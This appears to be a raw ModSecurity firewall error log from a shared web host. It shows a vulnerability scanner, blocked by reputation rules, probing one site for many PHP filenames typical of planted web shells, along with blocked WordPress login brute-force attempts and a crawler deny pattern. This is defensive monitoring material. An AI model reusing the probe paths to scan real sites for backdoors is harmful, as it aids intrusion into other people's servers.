[Tue May 26 19:40:35.721276 2026] [security2:error] [pid 70836:tid 70994] [client 20.151.117.104:28196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/sid3.php"] [unique_id "ahWp2-_FvbQ_BhqVMRWJUgAAAKE"]
[Tue May 26 19:40:35.721361 2026] [security2:error] [pid 70836:tid 70994] [client 20.151.117.104:28196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/sid3.php"] [unique_id "ahWp2-_FvbQ_BhqVMRWJUgAAAKE"]
[Tue May 26 19:40:36.280154 2026] [security2:error] [pid 70836:tid 70970] [client 20.151.117.104:28865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/load.php"] [unique_id "ahWp3O_FvbQ_BhqVMRWJagAAAIk"]
[Tue May 26 19:40:36.280293 2026] [security2:error] [pid 70836:tid 70970] [client 20.151.117.104:28865] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/load.php"] [unique_id "ahWp3O_FvbQ_BhqVMRWJagAAAIk"]
[Tue May 26 19:40:36.550026 2026] [security2:error] [pid 70836:tid 71027] [client 20.151.117.104:29715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/166.php"] [unique_id "ahWp3O_FvbQ_BhqVMRWJbAAAAMI"]
[Tue May 26 19:40:36.550118 2026] [security2:error] [pid 70836:tid 71027] [client 20.151.117.104:29715] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/166.php"] [unique_id "ahWp3O_FvbQ_BhqVMRWJbAAAAMI"]
[Tue May 26 19:40:36.723929 2026] [security2:error] [pid 70836:tid 71018] [client 87.106.152.203:54602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/images/images/cache.php"] [unique_id "ahWp3O_FvbQ_BhqVMRWJcwAAALk"], referer: www.google.com
[Tue May 26 19:40:37.262654 2026] [security2:error] [pid 70836:tid 71067] [client 20.151.117.104:28927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/load.php"] [unique_id "ahWp3e_FvbQ_BhqVMRWJiwAAAOo"]
[Tue May 26 19:40:37.262783 2026] [security2:error] [pid 70836:tid 71067] [client 20.151.117.104:28927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/load.php"] [unique_id "ahWp3e_FvbQ_BhqVMRWJiwAAAOo"]
[Tue May 26 19:40:37.711909 2026] [security2:error] [pid 70836:tid 71089] [client 20.151.117.104:28494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/166.php"] [unique_id "ahWp3e_FvbQ_BhqVMRWJkQAAAQA"]
[Tue May 26 19:40:37.711996 2026] [security2:error] [pid 70836:tid 71089] [client 20.151.117.104:28494] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/166.php"] [unique_id "ahWp3e_FvbQ_BhqVMRWJkQAAAQA"]
[Tue May 26 19:40:37.724926 2026] [security2:error] [pid 70836:tid 71000] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp3e_FvbQ_BhqVMRWJjAAAAKc"]
[Tue May 26 19:40:38.138674 2026] [security2:error] [pid 70836:tid 71047] [client 20.151.117.104:30043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-mail.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJpwAAANY"]
[Tue May 26 19:40:38.138849 2026] [security2:error] [pid 70836:tid 71047] [client 20.151.117.104:30043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-mail.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJpwAAANY"]
[Tue May 26 19:40:38.276520 2026] [security2:error] [pid 70836:tid 71012] [client 209.163.119.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJrgAAALM"], referer: https://www.anujtradingco.com/
[Tue May 26 19:40:38.900256 2026] [security2:error] [pid 70836:tid 70991] [client 20.151.117.104:29693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/leaf.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJyQAAAJ4"]
[Tue May 26 19:40:38.900366 2026] [security2:error] [pid 70836:tid 70991] [client 20.151.117.104:29693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/leaf.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJyQAAAJ4"]
[Tue May 26 19:40:39.371593 2026] [security2:error] [pid 70836:tid 71066] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp3u_FvbQ_BhqVMRWJ0QAAAOk"]
[Tue May 26 19:40:39.498889 2026] [security2:error] [pid 70836:tid 71043] [client 20.151.117.104:29679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/grsiuk.php"] [unique_id "ahWp3-_FvbQ_BhqVMRWJ3gAAANI"]
[Tue May 26 19:40:39.498998 2026] [security2:error] [pid 70836:tid 71043] [client 20.151.117.104:29679] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/grsiuk.php"] [unique_id "ahWp3-_FvbQ_BhqVMRWJ3gAAANI"]
[Tue May 26 19:40:39.925417 2026] [security2:error] [pid 70836:tid 71011] [client 20.151.117.104:29327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/8.php"] [unique_id "ahWp3-_FvbQ_BhqVMRWJ7wAAALI"]
[Tue May 26 19:40:39.925531 2026] [security2:error] [pid 70836:tid 71011] [client 20.151.117.104:29327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/8.php"] [unique_id "ahWp3-_FvbQ_BhqVMRWJ7wAAALI"]
[Tue May 26 19:40:40.733530 2026] [security2:error] [pid 70836:tid 70978] [client 20.151.117.104:27783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/fs.php"] [unique_id "ahWp4O_FvbQ_BhqVMRWKCQAAAJE"]
[Tue May 26 19:40:40.733658 2026] [security2:error] [pid 70836:tid 70978] [client 20.151.117.104:27783] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/fs.php"] [unique_id "ahWp4O_FvbQ_BhqVMRWKCQAAAJE"]
[Tue May 26 19:40:40.940223 2026] [security2:error] [pid 70836:tid 70987] [client 114.119.129.81:42973] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/images/a-amccontract.jpg"] [unique_id "ahWp4O_FvbQ_BhqVMRWKEQAAAJo"], referer: https://www.siliconelevators.in/siliconelevators-amc.php
[Tue May 26 19:40:41.053432 2026] [security2:error] [pid 70836:tid 71004] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp4O_FvbQ_BhqVMRWKAgAAAKs"]
[Tue May 26 19:40:41.263902 2026] [security2:error] [pid 70836:tid 70974] [client 20.151.117.104:29708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ws38.php"] [unique_id "ahWp4e_FvbQ_BhqVMRWKHgAAAI0"]
[Tue May 26 19:40:41.263990 2026] [security2:error] [pid 70836:tid 70974] [client 20.151.117.104:29708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/ws38.php"] [unique_id "ahWp4e_FvbQ_BhqVMRWKHgAAAI0"]
[Tue May 26 19:40:41.648729 2026] [security2:error] [pid 70836:tid 71061] [client 20.151.117.104:29649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/a7.php"] [unique_id "ahWp4e_FvbQ_BhqVMRWKLAAAAOQ"]
[Tue May 26 19:40:41.648813 2026] [security2:error] [pid 70836:tid 71061] [client 20.151.117.104:29649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/a7.php"] [unique_id "ahWp4e_FvbQ_BhqVMRWKLAAAAOQ"]
[Tue May 26 19:40:42.047465 2026] [security2:error] [pid 70836:tid 70976] [client 20.151.117.104:30127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/classsmtps.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKQgAAAI8"]
[Tue May 26 19:40:42.047598 2026] [security2:error] [pid 70836:tid 70976] [client 20.151.117.104:30127] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/classsmtps.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKQgAAAI8"]
[Tue May 26 19:40:42.364451 2026] [security2:error] [pid 70836:tid 71065] [client 20.151.117.104:29321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/amax.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKTAAAAOg"]
[Tue May 26 19:40:42.364542 2026] [security2:error] [pid 70836:tid 71065] [client 20.151.117.104:29321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/amax.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKTAAAAOg"]
[Tue May 26 19:40:42.684563 2026] [security2:error] [pid 70836:tid 71029] [client 20.151.117.104:28500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/CDX1.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKVwAAAMQ"]
[Tue May 26 19:40:42.684685 2026] [security2:error] [pid 70836:tid 71029] [client 20.151.117.104:28500] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/CDX1.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKVwAAAMQ"]
[Tue May 26 19:40:43.245698 2026] [security2:error] [pid 70836:tid 71038] [client 209.163.119.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKZwAAAM0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1220218&moderation-hash=ac6b7ec50bab572b71ca916c53e7697f
[Tue May 26 19:40:43.253830 2026] [security2:error] [pid 70836:tid 71007] [client 20.151.117.104:29263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/rip.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKbgAAAK4"]
[Tue May 26 19:40:43.253914 2026] [security2:error] [pid 70836:tid 71007] [client 20.151.117.104:29263] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/rip.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKbgAAAK4"]
[Tue May 26 19:40:43.373073 2026] [security2:error] [pid 70836:tid 71001] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKXQAAAKg"]
[Tue May 26 19:40:43.481723 2026] [security2:error] [pid 70836:tid 71082] [client 102.164.188.174:16536] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/compta/bank/various_payment/card.php"] [unique_id "ahWp4u_FvbQ_BhqVMRWKUgAA-S0"], referer: https://erp.azurmediatec.com/compta/bank/various_payment/card.php?action=create
[Tue May 26 19:40:43.581464 2026] [security2:error] [pid 70836:tid 71052] [client 20.151.117.104:30021] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "samayikprasanga.in"] [uri "/1.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKegAAANs"]
[Tue May 26 19:40:43.581576 2026] [security2:error] [pid 70836:tid 71052] [client 20.151.117.104:30021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/1.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKegAAANs"]
[Tue May 26 19:40:43.581681 2026] [security2:error] [pid 70836:tid 71052] [client 20.151.117.104:30021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/1.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKegAAANs"]
[Tue May 26 19:40:43.962444 2026] [security2:error] [pid 70836:tid 71002] [client 20.151.117.104:28868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/chosen.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKhwAAAKk"]
[Tue May 26 19:40:43.962536 2026] [security2:error] [pid 70836:tid 71002] [client 20.151.117.104:28868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/chosen.php"] [unique_id "ahWp4-_FvbQ_BhqVMRWKhwAAAKk"]
[Tue May 26 19:40:44.709952 2026] [security2:error] [pid 70836:tid 71040] [client 20.151.117.104:30069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/css.php"] [unique_id "ahWp5O_FvbQ_BhqVMRWKpwAAAM8"]
[Tue May 26 19:40:44.710087 2026] [security2:error] [pid 70836:tid 71040] [client 20.151.117.104:30069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/css.php"] [unique_id "ahWp5O_FvbQ_BhqVMRWKpwAAAM8"]
[Tue May 26 19:40:44.787323 2026] [security2:error] [pid 70836:tid 71039] [client 114.119.138.207:48221] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/category/lifestyle/page/7"] [unique_id "ahWp5O_FvbQ_BhqVMRWKqAAAAM4"], referer: http://www.anujtradingco.com/category/lifestyle/page/5
[Tue May 26 19:40:45.398310 2026] [security2:error] [pid 70836:tid 70991] [client 20.151.117.104:29641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/php.php"] [unique_id "ahWp5e_FvbQ_BhqVMRWKuwAAAJ4"]
[Tue May 26 19:40:45.398410 2026] [security2:error] [pid 70836:tid 70991] [client 20.151.117.104:29641] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/php.php"] [unique_id "ahWp5e_FvbQ_BhqVMRWKuwAAAJ4"]
[Tue May 26 19:40:46.079058 2026] [security2:error] [pid 70836:tid 70898] [remote 162.214.184.71:42398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp5e_FvbQ_BhqVMRWK1AAApT0"]
[Tue May 26 19:40:46.639816 2026] [security2:error] [pid 70836:tid 71010] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp5u_FvbQ_BhqVMRWK2AAAALE"]
[Tue May 26 19:40:46.686143 2026] [security2:error] [pid 70836:tid 71080] [client 20.151.117.104:29676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-Blogs.php"] [unique_id "ahWp5u_FvbQ_BhqVMRWK7AAAAPc"]
[Tue May 26 19:40:46.686247 2026] [security2:error] [pid 70836:tid 71080] [client 20.151.117.104:29676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-Blogs.php"] [unique_id "ahWp5u_FvbQ_BhqVMRWK7AAAAPc"]
[Tue May 26 19:40:47.918313 2026] [security2:error] [pid 70836:tid 70966] [client 20.151.117.104:29299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-content/index.php"] [unique_id "ahWp5-_FvbQ_BhqVMRWLGwAAAIU"]
[Tue May 26 19:40:47.918420 2026] [security2:error] [pid 70836:tid 70966] [client 20.151.117.104:29299] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-content/index.php"] [unique_id "ahWp5-_FvbQ_BhqVMRWLGwAAAIU"]
[Tue May 26 19:40:48.811467 2026] [security2:error] [pid 70836:tid 70933] [remote 3.208.180.187:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWp6O_FvbQ_BhqVMRWLNwAA32A"]
[Tue May 26 19:40:48.947126 2026] [security2:error] [pid 70836:tid 70938] [remote 141.95.202.18:54590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp6O_FvbQ_BhqVMRWLOQABBGU"]
[Tue May 26 19:40:49.033605 2026] [security2:error] [pid 70836:tid 71079] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp6O_FvbQ_BhqVMRWLMgAAAPY"]
[Tue May 26 19:40:49.339993 2026] [security2:error] [pid 70836:tid 70924] [remote 74.91.224.220:52080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWp6e_FvbQ_BhqVMRWLRwAA4Vc"]
[Tue May 26 19:40:49.393447 2026] [security2:error] [pid 70836:tid 71026] [client 43.173.178.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWp6e_FvbQ_BhqVMRWLTQAAAME"]
